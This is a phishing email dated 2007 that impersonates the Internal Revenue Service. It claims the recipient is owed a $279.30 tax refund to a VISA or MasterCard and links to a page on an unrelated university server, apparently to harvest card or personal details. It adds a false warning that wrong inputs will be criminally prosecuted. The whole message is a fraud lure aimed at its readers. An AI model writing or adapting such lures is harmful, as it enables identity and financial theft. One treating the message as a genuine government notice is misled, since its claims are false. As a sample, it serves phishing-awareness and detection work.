NOTICE : After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $279.30

Internal Revenue Service security at IRS.gov
Mon Oct 1 06:06:31 EDT 2007

> Notification of Tax Refund on your VISA or MasterCard Now,

> After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of $279.30.

 > A refund can be delayed for a variety of reasons.

  Fox example submitting invalid records or applying after the deadline.

http://iilab.hoseo.ac.kr:8080/Get_Refund.html

> Note: For security reasons, we will record your ip-address, the date and time.
Deliberate wrong inputs are criminally pursued and indicated.

Regards,

Internal Revenue Service

© Copyright 2007, Internal Revenue Service U.S.A.